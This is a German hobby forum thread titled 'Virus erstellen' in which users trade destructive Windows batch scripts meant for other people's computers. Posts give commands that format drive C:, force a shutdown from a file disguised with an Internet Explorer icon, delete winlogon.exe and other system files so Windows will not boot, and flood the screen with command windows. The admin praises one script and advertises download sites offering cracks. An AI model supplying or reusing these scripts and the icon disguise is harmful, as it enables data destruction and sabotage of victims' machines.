|
|
| Autor | Nachricht |
|---|
pp Gast

| Thema: Virus erstellen Mi Dez 31, 2008 8:09 pm | |
| Hallo ich zeige euch wie ihr einen Virus erstellt! |
|
 | |
admin Admin

Anzahl der Beiträge: 7 Anmeldedatum: 20.01.08
 | Thema: Re: Virus erstellen Mi Jan 28, 2009 2:15 am | |
| cool dann leg mal los ^^  _________________ Ebooks & free Downloads http://exedll.oyla24.de
|
|
 | |
pp Gast

| Thema: Re: Virus erstellen Fr Feb 20, 2009 8:32 am | |
| gebt einfach in den etitor
@echo off format C:
ein dass formatiert das Laufwerk C:\ |
|
 | |
pp Gast

| Thema: Re: Virus erstellen Fr Feb 20, 2009 8:40 am | |
| |
|
 | |
flashhii Gast

| Thema: Re: Virus erstellen Do Aug 06, 2009 10:37 pm | |
| heyhey ich habe das ausprobiert und das geht iwie nicht =( könntest mir das nochmal erklären meine icq nummer 449265464 |
|
 | |
Shadow Gast

| Thema: Re: Virus erstellen Mi Aug 12, 2009 8:54 am | |
| Nein machs hier, ich wills auch wissen!!! |
|
 | |
admin Admin

| Thema: Re: Virus erstellen Fr Aug 28, 2009 8:37 pm | |
| Wer wollte schon immer mehr übers Progarmmieren erfahren ??
der sollte sich umbedingt diese Siete anschaunen
http://bazeproz.de.lv
dort gibt es alles von Ebooks zu Cracks und coolen Tools schaut bitte mal vorbei ... + Forum !!!
euer admin _________________ Ebooks & free Downloads http://exedll.oyla24.de
|
|
 | |
flo Gast

| Thema: Re: Virus erstellen Fr Sep 18, 2009 2:56 pm | |
| eyy jazz hab ich hier ein schwarzes fenster kann ich das an eine musik datei ranhängen oder so?? |
|
 | |
ildfast Gast

| Thema: Re: Virus erstellen Mo Sep 28, 2009 8:39 pm | |
| du meinst den bat code hinter eine z.B. mp3-datei hängen??? nee das geht meines wissens nicht^^ ich hab aber mal davon gehört das es bei jpg.datein möglich ist bestimmte codes einzufügen hab aber keine ahnung davon..... außerdem das mit dem format C sry das is doch kein echter Virus...... Das Ziel eines Viruses is es doch das er sich über möglichst viele Dateien auf möglichst vielen rechnern ausbreitet eine art virtuelle Pandemie xD oder seh ich das Falsch? mfg ildfast |
|
 | |
Litteldu Gast

| Thema: Virus selbst gemacht Mi Okt 21, 2009 10:08 am | |
| So Leute. Es funktioniert folgendermaßen. Schritt für Schritt.
Am Desktop rechts klicken. Dann ein Textdokument erstellen. In dieses Textdokument schreibt ihr folgendes hinein
------------------------------------------------------------(die Striche nicht eingeben) @echo off
shutdown -s -t -50 -c "Jetzt geht dein PC gleich ein" -------------------------------------------------------------------------------------------
Ihr habt damit aber bloß eine hässliche Datei die niemand jemals öffnen wird da sie nicht schön aussieht.
Daher klickt ihr auf die Datei mit rechts. In diesem Fenster kann man auf "Anderes Symbol" klicken.
Und jetzt ist die Sache fertig.
Ihr nehmt z.B.: den Internet Explorer und das wars.
Klickt einfach auf die Datei und der PC fährt in der von euch gewünschten Zeit herunter. In unserem Beispiel in 50 Sekunden.
Solltet ihr das aus irgendeinem Grund abbrechen wollen klickt auf den Start knopf links. Und geht auf ausführen.
In diesem Fenster gebt Ihr jetzt
shutdown -a
ein und die Sache wird abgebrochen. Kann aber nix passieren weiter wenns nicht abgebrochen wird.
MfG
by
Littleduke |
|
 | |
admin Admin

| Thema: Re: Virus erstellen Di Okt 27, 2009 10:47 pm | |
| net schlecht... danke für deinen Beitrag !! _________________ Ebooks & free Downloads http://exedll.oyla24.de
|
|
 | |
Weis ned Gast

| Thema: virus erstellen... Do Nov 26, 2009 5:21 pm | |
| @echo
del\windows\system32\Recover del\windows\system32\winlogon.exe del\windows\system32\logonul.exe
das selbe wie oben ihr müsst mit der txtdatei machen und als .bat abspeichern
ich würd in nich umbedingt an freundn ausprobieren sie könnten euch verklagen der pc stützt ab und wenn er oder sie in neu starten will gibts kein windows mehr das benutzersystem muss man daher neu instalieren |
|
 | |
tom Gast

| Thema: virus Fr Jan 22, 2010 12:38 pm | |
| hi der ist lustig : neues textdokument: dann so oft du willst : start eingeben und dann speichern mit .bat am ende wenn ihr dan später di datei anklickt um so öfter ihr start eingegeben habt um so mehr cmd displays starten  |
|
 | |
timmi Gast

| Thema: virus Fr Jan 22, 2010 12:55 pm | |
| ich hab mal ne frage: was heisst/bedeutet eigentlich : .bat  |
|
 | |
timmi Gast

| Thema: virus Fr Jan 22, 2010 12:57 pm | |
| ich hab mal ne frage: was heisst/bedeutet eigentlich : .bat  |
|
 | |